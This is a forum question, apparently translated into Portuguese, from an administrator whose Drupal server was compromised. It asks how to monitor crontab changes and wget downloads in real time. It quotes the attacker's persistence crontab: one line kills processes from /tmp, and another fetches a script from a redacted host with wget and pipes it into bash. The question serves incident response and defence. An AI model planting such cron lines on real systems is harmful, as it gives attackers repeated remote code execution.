Como as tentativas de criar ou modificar o arquivo do sistema de arquivos local e obter um arquivo via web a partir de um endereço específico podem ser monitoradas em tempo real?

Meu servidor web foi invadido e, depois de não ser capaz de dizer qual executável estava em execução, perguntei como detectar o nome do arquivo, sobre o qual perguntei anteriormente em Como posso diagnosticar um processo que não possui um nome de arquivo executável associado com isso?

Depois de matar o processo, fiquei imaginando como ele retornou e, depois de verificar o crontab, descobri isso.

* * * * * ps aux | grep /tmp | egrep -v systemd | awk '{print $2}' | xargs -t kill -9
16 2,20 * * * wget -O - http://xxx.xxx.xxx.xxx:xxxx/_somefile.jpg | bash -s

Eu suspeito que o hack foi através destas vulnerabilidades núcleo Drupal - altamente crítico - Execução Remota de Código - SA-CORE-2018 -002 e núcleo Drupal - altamente crítico - Execução Remota de Código - SA-CORE-2018-004 . Eu estava rodando o servidor web como um processo php-fpm usando uma conta não privilegiada, e presumo que essa é a razão pela qual o hack não poderia causar mais danos (talvez não tenha sido projetado dessa forma). Os arquivos do servidor web também estão sob controle git e pareciam bem.

Eu pretendo transferir os arquivos do servidor da web para um novo servidor, mas não posso ter certeza se os arquivos podem não conter a vulnerabilidade oculta em algum lugar. Então as principais perguntas são:

1. Como posso monitorar ou rastrear uma tentativa de modificar os usuários crontab em tempo real?

2. Como faço para detectar a chamada wget para atualizar e executar o executável? é se eu instalá-los, como posso detectar uma tentativa de alterar o arquivo crontab .

PS. Em relação à questão vinculada, foi assim que encontrei o nome do executável.

adminx@gw06  ~  ls -l /proc/10160/exe
lrwxrwxrwx 1 adminx adminx 0 Jun  3 09:22 /proc/10160/exe -> /dev/shm/apache (deleted)

Eu também suspeito que o endereço IP e a porta do servidor de malware podem ter sido o destino do meu servidor apenas nos horários especificados, porque quando tentei wget o arquivo não aconteceu. Às 15:03, nada parece ter acontecido, embora o crontab ainda esteja em vigor.